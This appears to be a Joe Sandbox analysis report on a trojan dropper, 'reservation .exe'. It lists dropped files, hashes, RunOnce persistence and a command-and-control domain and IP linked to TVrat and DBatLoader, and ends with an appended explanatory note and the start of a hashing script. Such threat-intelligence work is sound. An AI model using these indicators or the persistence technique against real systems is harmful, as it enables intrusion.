C:\Users\user\AppData\Local\Temp\qilq\is-K402A.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\is-MGO66.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\is-OUNKJ.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\is-PDQGE.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\is-RFQHO.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\is-SJ8AI.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\is-SSL54.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\libcrypto-1_1.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\libcryptoMD.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\libcurl.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\libeay32.dll (copy) | 4% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\libjpeg-turbo-win.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\libssl-1_1.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\msvcr120.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\qilq\opus.dll (copy) | 0% | ReversingLabs

No Antivirus matches
No Antivirus matches
                                                                                      high
                                                                                      https://sectigo.com/CPS0Creservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://sectigo.com/CPS0Dxcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drfalse
                                                                                          high
                                                                                          https://id.xn--80akicokc0aablc.xn--p1ai)ast.exe, 0000000A.00000002.3307636336.0000000002EF2000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://id.xn--80akicokc0aablc.xn--p1ai:443ast.exe, 0000000A.00000003.3299966293.0000000005C3D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3321452635.0000000005C02000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2835407797.0000000005C02000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005C35000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2807629713.0000000005C27000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914306157.0000000005C39000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://id.xn--80akicokc0aablc.xn--p1ai:443lnw#ast.exe, 0000000A.00000002.3320611390.0000000005BE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://id.xn--80akicokc0aablc.xn--p1ai:443...ast.exe, 0000000A.00000002.3324461869.0000000006A0C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://id.xn--80akicokc0aablc.xn--p1ai:443g1ast.exe, 0000000A.00000003.3265137068.0000000005C20000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3267513698.0000000005C25000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C23000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://id.xn--80akicokc0aablc.xn--p1ai:443lndmast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://id.xn--80akicokc0aablc.xn--p1ai:443...4335AWast.exe, 0000000A.00000002.3307636336.0000000002EE3000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.sqlite.org/copyright.html.reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873934994.0000000061EA0000.00000008.00000001.01000000.0000000D.sdmpfalse
                                                                                                high
                                                                                                https://id.xn--80akicokc0aablc.xn--p1ai00ast.exe, 0000000A.00000002.3306161257.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://sectigo.com/CPS0xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drfalse
                                                                                                  high
                                                                                                  https://www.openssl.org/docs/faq.htmlxcopy.exe, 00000008.00000003.2457697380.000000000310F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://id.xn--80akicokc0aablc.xn--p1aieYast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://id.xn--80akicokc0aablc.xn--p1ai:44335...ast.exe, 0000000A.00000002.3309198121.000000000311B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://id.xn--80akicokc0aablc.xn--p1aidllast.exe, 0000000A.00000003.3183555638.0000000005BFB000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://id.xn--80akicokc0aablc.xn--p1aidllmast.exe, 0000000A.00000002.3322683873.0000000005C68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://id.xn-ast.exe, 0000000A.00000003.3183555638.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2835183941.0000000005C31000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2895606355.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C23000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914485845.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0txcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drfalse
                                                                                                      high
                                                                                                      https://id.xn--80akicokc0aablc.xn--p1ai:443ghast.exe, 0000000A.00000002.3321452635.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
IP: 212.193.169.65
Domain: id.xn--80akicokc0aablc.xn--p1ai
Country: Russian Federation
ASN: 60329
ASN Name: SAFIB-ASRU
Malicious: false

IP: 127.0.0.1
                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1558751
                                                                                                      Start date and time:2024-11-19 19:13:08 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 11m 45s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:reservation .exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal84.troj.evad.winEXE@16/63@1/2
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HCA Information:Failed
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                      • VT rate limit hit for: reservation .exe
Time | Type | Description
13:15:10 | API Interceptor | 3241x Sleep call for process: ast.exe modified
19:15:14 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce fat C:\Users\user\AppData\Roaming\fat\ast.exe
19:15:22 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce fat C:\Users\user\AppData\Roaming\fat\ast.exe
Match: 212.193.169.65
Associated Sample Name / URL | Detection | Threat Name | Context
1.exe | malicious | DBatLoader, TVrat | id.xn--80akicokc0aablc.xn--p1ai:443 http://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec
scan_9374673_Medoc.pdf.exe | malicious | DBatLoader, TVrat | id.xn--80akicokc0aablc.xn--p1ai:80 http://id.xn--80akicokc0aablc.xn--p1ai:80/api/exec
Match: id.xn--80akicokc0aablc.xn--p1ai
Associated Sample Name / URL | Detection | Threat Name | Context
oZ3vtWXObB.exe | malicious | TVrat | 212.193.169.65
aeyh21MAtA.exe | malicious | TVrat | 212.193.169.65
wjpP1EOX0L.exe | malicious | TVrat | 212.193.169.65
oZ3vtWXObB.exe | malicious | TVrat | 212.193.169.65
aeyh21MAtA.exe | malicious | TVrat | 212.193.169.65
wjpP1EOX0L.exe | malicious | TVrat | 212.193.169.65
1.exe | malicious | DBatLoader, TVrat | 212.193.169.65
1.exe | malicious | DBatLoader, TVrat | 212.193.169.65
scan_9374673_Medoc.pdf.exe | malicious | DBatLoader, TVrat | 185.40.77.244
scan_9374673_Medoc.pdf.exe | malicious | DBatLoader, TVrat | 185.40.77.244
Match: SAFIB-ASRU
Associated Sample Name / URL | Detection | Threat Name | Context
oZ3vtWXObB.exe | malicious | TVrat | 212.193.169.65
aeyh21MAtA.exe | malicious | TVrat | 212.193.169.65
wjpP1EOX0L.exe | malicious | TVrat | 212.193.169.65
PkWnPA8l7C.exe | malicious | DBatLoader, TVrat | 212.193.169.68
oZ3vtWXObB.exe | malicious | TVrat | 212.193.169.65
aeyh21MAtA.exe | malicious | TVrat | 212.193.169.65
wjpP1EOX0L.exe | malicious | TVrat | 212.193.169.65
1.exe | malicious | DBatLoader, TVrat | 212.193.169.65
1.exe | malicious | DBatLoader, TVrat | 212.193.169.68
scan_9374673_Medoc.pdf.exe | malicious | DBatLoader, TVrat | 212.193.169.68
Match: 74954a0c86284d0d6e1c4efefe92b521
Associated Sample Name / URL | Detection | Threat Name | Context
oZ3vtWXObB.exe | malicious | TVrat | 212.193.169.65
aeyh21MAtA.exe | malicious | TVrat | 212.193.169.65
wjpP1EOX0L.exe | malicious | TVrat | 212.193.169.65
PkWnPA8l7C.exe | malicious | DBatLoader, TVrat | 212.193.169.65
oZ3vtWXObB.exe | malicious | TVrat | 212.193.169.65
aeyh21MAtA.exe | malicious | TVrat | 212.193.169.65
wjpP1EOX0L.exe | malicious | TVrat | 212.193.169.65
avast_free_antivirus_setup_online.exe | malicious | Unknown | 212.193.169.65
avast_free_antivirus_setup_online.exe | malicious | Unknown | 212.193.169.65
file.exe | malicious | Unknown | 212.193.169.65
Match: C:\Users\user\AppData\Local\Temp\is-BE9V9.tmp\_isetup\_iscrypt.dll
Associated Sample Name / URL | Detection | Threat Name
oZ3vtWXObB.exe | malicious | TVrat
aeyh21MAtA.exe | malicious | TVrat
wjpP1EOX0L.exe | malicious | TVrat
PkWnPA8l7C.exe | malicious | DBatLoader, TVrat
oZ3vtWXObB.exe | malicious | TVrat
aeyh21MAtA.exe | malicious | TVrat
wjpP1EOX0L.exe | malicious | TVrat
1.exe | malicious | DBatLoader, TVrat
1.exe | malicious | DBatLoader, TVrat
i7j22nof2Q.exe | malicious | Socks5Systemz
                                                                                                                          Process:C:\Users\user\Desktop\reservation .exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3152384
                                                                                                                          Entropy (8bit):6.384961431993512
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:UWGtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbh333tkru:AtLutqgwh4NYxtJpkxhGi333tki
                                                                                                                          MD5:D3E870E4BBE9AAF106AB9B0510956A89
                                                                                                                          SHA1:C8B7A473A78E1EDB74116533B24BC87F1D9DE686
                                                                                                                          SHA-256:1E46C7F1CE79E5D5D3A8049B6610B74DA8905D1C796119C7159B92D071B47F36
                                                                                                                          SHA-512:D904BF73A5DC77D92847DE2AC5662CD1442E491B60A3495AC971AD2BB1F3D621D2F74AF3B4729B27C96D61EAC66833DB96665C798285E7495AD3D355CEE02756
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:low
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,.........hf,......p,...@...........................1...........@......@....................-.......-..9......|............................................................................-.......-......................text.... ,......",................. ..`.itext...(...@,..*...&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......*-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc...|.............-.............@..@..............1.......0.............@..@........................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2560
                                                                                                                          Entropy (8bit):2.8818118453929262
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Joe Sandbox View:
                                                                                                                          • Filename: oZ3vtWXObB.exe, Detection: malicious, Browse
                                                                                                                          • Filename: aeyh21MAtA.exe, Detection: malicious, Browse
                                                                                                                          • Filename: wjpP1EOX0L.exe, Detection: malicious, Browse
                                                                                                                          • Filename: PkWnPA8l7C.exe, Detection: malicious, Browse
                                                                                                                          • Filename: oZ3vtWXObB.exe, Detection: malicious, Browse
                                                                                                                          • Filename: aeyh21MAtA.exe, Detection: malicious, Browse
                                                                                                                          • Filename: wjpP1EOX0L.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 1.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 1.exe, Detection: malicious, Browse
                                                                                                                          • Filename: i7j22nof2Q.exe, Detection: malicious, Browse
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6144
                                                                                                                          Entropy (8bit):4.720366600008286
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\Desktop\reservation .exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3152384
                                                                                                                          Entropy (8bit):6.384961431993512
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:UWGtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbh333tkru:AtLutqgwh4NYxtJpkxhGi333tki
                                                                                                                          MD5:D3E870E4BBE9AAF106AB9B0510956A89
                                                                                                                          SHA1:C8B7A473A78E1EDB74116533B24BC87F1D9DE686
                                                                                                                          SHA-256:1E46C7F1CE79E5D5D3A8049B6610B74DA8905D1C796119C7159B92D071B47F36
                                                                                                                          SHA-512:D904BF73A5DC77D92847DE2AC5662CD1442E491B60A3495AC971AD2BB1F3D621D2F74AF3B4729B27C96D61EAC66833DB96665C798285E7495AD3D355CEE02756
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,.........hf,......p,...@...........................1...........@......@....................-.......-..9......|............................................................................-.......-......................text.... ,......",................. ..`.itext...(...@,..*...&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......*-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc...|.............-.............@..@..............1.......0.............@..@........................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2560
                                                                                                                          Entropy (8bit):2.8818118453929262
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp
                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6144
                                                                                                                          Entropy (8bit):4.720366600008286
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):43
                                                                                                                          Entropy (8bit):5.286729870981167
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:SYMGa4VOUbLDFwozJO+n:SBU/Bwoz7n
                                                                                                                          MD5:33118193A9FD63FBCF60AE73FC60199E
                                                                                                                          SHA1:8DAFC111E44FABAE3EAD8325BB03E97871393D99
                                                                                                                          SHA-256:1E0DB7EB8AA0E8D9203FBB39753E82D6077A867ADF93D438CE24333686793159
                                                                                                                          SHA-512:647F151D68094BCCC313006C6BCA06505A2EBDE58C014901D71FFED01285172F124EF0FA400A6481D30BFBA021C674959AF0D2061BB11466A28BB79C096A20E5
                                                                                                                          Malicious:false
                                                                                                                          Preview:.>..i"_(..9E..+.S-..;.f.-.si..MZ......c:...
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):172216
                                                                                                                          Entropy (8bit):6.698242571688099
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:nGhQI/PxvCWRDvcDfo0F5HekeyO54ECV0/sMHL0WPCCb5rAg0Fujx8E0/3xt9qKv:kPxqWYF5HkyDLMsOzrAOL23VqK28j
                                                                                                                          MD5:CF1169A87FE6266C7B457A2424DA69DA
                                                                                                                          SHA1:5ADD67DEFD4CA56C1E9C0B239899EA699B140B64
                                                                                                                          SHA-256:24E01FD95225E260CDD41015A70374A048568D4DF6681B3D44EAABCB1EA03EAF
                                                                                                                          SHA-512:7BF76EB5B4E31A65931AF730909FBF848334BC98DA279E291E186FCAFDC81C76D1EF0EFEC4E00B8EAEDE6F8D130DA8B6B3D3C5DD8C14C6DCD3BCDC7D050A4B66
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.%.).K.).K.).K.r.H.$.K.r.N...K.r.O.?.K...J.-.K.{.H.=.K.{.N...K.{.O...K.r.J...K.).J...K...B.!.K...K.(.K.....(.K.)..(.K...I.(.K.Rich).K.................PE..L.....@a...........!.....t...........V..............................................B.....@.........................`X..h....X..P.......(............|...$...........H..8............................H..@...............8............................text....s.......t.................. ..`.rdata...............x..............@..@.data........p.......P..............@....rsrc...(............\..............@..@.reloc...............b..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7543992
                                                                                                                          Entropy (8bit):6.717610928993395
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:q0f/bCIDcCkgVmZqIXrdoXj++CEKDFBaVOGizeKFUtqiAp+hRWmMLlJ7p1:X/bCIPkgVpycKDFqOLNUtqiAz
                                                                                                                          MD5:8002D9E5851728EB024B398CF19DE390
                                                                                                                          SHA1:9A1DC7134F3F6FCCB37DFC4DDDA35DFA2875095E
                                                                                                                          SHA-256:B8DDE42C70D8C4A3511D5EDFFBC9F7F0C03DBDA980E29693E71344F76DA6BB0F
                                                                                                                          SHA-512:6936B6B01F9FC2F2F69DE6AE468A9F7173239BD003AD8B7BC7336C4DD4DB50457E20EC6783B2E8A166D684A56F3F1E9FB701CA903DF3F74E3CA25C46B8A8D00E
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....@a..................K..`'.......K.......K...@...........................y.......s..........@............................S..m....X..f ...........r..$... T.8d............T...............T.....................@.S..............................text... .J.......J................. ..`.itext..$.....J.......J............. ..`.data...T"....K..$....K.............@....bss..........M.......M..................idata...m....S..n....M.............@....tls....D.....T......*N..................rdata..#.....T......*N.............@..@.reloc..8d... T..f...,N.............@..B.rsrc....f ...X..f ...R.............@..@..............y.......r.............@..@................................................................................................
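The Size, Entropy (8bit) and hash rows in each dropped-file entry, and the DOS-stub text visible at the start of every PE preview (MZP with "This program must be run under Win32" is the Borland/Delphi linker stub, consistent with the is-XXXX.tmp Inno Setup extraction paths; "This program cannot be run in DOS mode" is the Microsoft linker stub), can be reproduced for any file with the script below. It is an added example and not part of the Joe Sandbox report: the minimal PE it builds is constructed so the script runs offline, the stub-to-linker mapping is a heuristic of this example rather than a field the report provides, and the per-section entropy it adds is something the listing does not show.

```python
import hashlib
import math
import struct
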